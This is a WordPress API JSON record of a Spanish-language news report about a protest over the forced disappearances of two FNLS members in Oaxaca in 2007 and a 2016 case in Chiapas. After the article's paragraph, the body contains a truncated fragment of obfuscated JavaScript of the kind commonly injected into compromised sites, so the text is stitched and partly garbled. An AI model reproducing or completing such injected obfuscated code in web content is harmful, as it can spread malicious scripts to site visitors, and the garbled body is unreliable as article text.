{"id":4051,"date":"2022-08-02T00:01:34","date_gmt":"2022-08-02T00:01:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4051"},"modified":"2022-08-02T00:01:35","modified_gmt":"2022-08-02T00:01:35","slug":"fnls-denuncia-desaparicion-forzada-de-dos-integrantes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4051","title":{"rendered":"FNLS denuncia desaparici\u00f3n forzada de dos integrantes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"411\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0017.jpg\" alt=\"\" class=\"wp-image-4048\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0017.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0017-300x171.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. Agencia ReporteCiudadano, 1 de agosto del 2022. Tuxtla Guti\u00e9rrez.- La Suprema Corte de Justicia de la Naci\u00f3n, emitir\u00e1 un fallo sobre las desapariciones forzadas de dos integrantes del Frente Nacional de la Lucha por el Socialismo, ocurridas en 2007 y que la Corte atrajo en 2011.Este d\u00eda durante una protesta recordaron que, Gabriel Alberto Cruz S\u00e1nchez y Edmundo Reyes Amaya, fueron levantados en Oaxaca, por un grupo presuntamente militar y hasta la fecha se desconoce su paradero. Por ello, se realiz\u00f3 una jornada nacional de lucha por su presentaci\u00f3n con vida.Esta organizaci\u00f3n sostendr\u00e1 un plant\u00f3n en las instalaciones de la Suprema Corte de Justicia, luego de dos a\u00f1os de atraer este caso de desaparici\u00f3n forzada y hasta el momento no ha emitido una sentencia, en Chiapas, tambi\u00e9n existe un caso de desaparici\u00f3n forzada, perpetrada presuntamente en 2016 en Ocosingo, por un grupo de polic\u00edas estatales. El vocero de la agrupaci\u00f3n se\u00f1al\u00f3 que: \u201cFidencio G\u00f3mez Santiz, y los miles de detenidos desaparecidos en el pa\u00eds, la desaparici\u00f3n forzada en M\u00e9xico, es una grave violaci\u00f3n a los derechos humanos, que abarca el pasado y el presente por los da\u00f1os que genera en la familia\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 1 de agosto del 2022. Tuxtla Guti\u00e9rrez.- La Suprema Corte de Justicia de la Naci\u00f3n, emitir\u00e1 un fallo sobre las desapariciones forzadas de dos integrantes del Frente Nacional de la Lucha por el Socialismo, ocurridas en 2007 y que la Corte atrajo en 2011.Este d\u00eda durante una protesta recordaron que, Gabriel &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4051","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4051","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4051"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4051\/revisions"}],"predecessor-version":[{"id":4052,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4051\/revisions\/4052"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4048"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4051"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4051"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4051"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}